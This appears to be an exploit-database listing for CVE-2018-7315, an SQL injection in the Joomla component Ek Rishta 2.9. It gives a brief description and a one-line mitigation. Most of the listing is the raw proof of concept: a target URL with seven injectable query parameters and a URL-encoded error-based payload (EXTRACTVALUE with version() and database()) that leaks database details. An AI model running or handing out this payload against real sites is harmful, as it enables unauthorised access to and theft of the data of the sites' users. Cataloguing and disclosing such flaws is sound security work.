header-logo
Suggest Exploit
vendor:
Ek Rishta
by:
Ihsan Sencan
9.8
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: Ek Rishta
Affected Version From: 2.9
Affected Version To: 2.9
Patch Exists: YES
Related CWE: CVE-2018-7315
CPE: a:joomlaextensions.co.in:ek_rishta:2.9
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2018

Joomla! Component Ek Rishta 2.9 – SQL Injection

Joomla! Component Ek Rishta 2.9 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter of the application. This can allow the attacker to access or modify the data in the back-end database.

Mitigation:

Input validation should be used to prevent SQL Injection attacks. The application should use parameterized queries to prevent SQL Injection.
Source

Exploit-DB raw data:

# # # #
# Exploit Title: Joomla! Component Ek Rishta 2.9 - SQL Injection
# Dork: N/A
# Date: 22.02.2018
# Vendor Homepage: https://www.joomlaextensions.co.in/
# Software Link: https://extensions.joomla.org/extensions/extension/living/dating-a-relationships/ek-rishta/
# Version: 2.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-7315
# # # #
# Exploit Author: Ihsan Sencan
# # # #
# 
# POC: 
# 
# 1)
# http://localhost/[PATH]/index.php/component/ekrishta/alluser?options=com_ekrishta&view=alluser
# &gender=[SQL]
# &age1=[SQL]
# &age2=[SQL]
# &religion=[SQL]
# &mothertounge=[SQL]
# &caste=[SQL]
# &country=[SQL]
# 
# %27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%56%65%72%41%79%61%72%69
# 
# # # #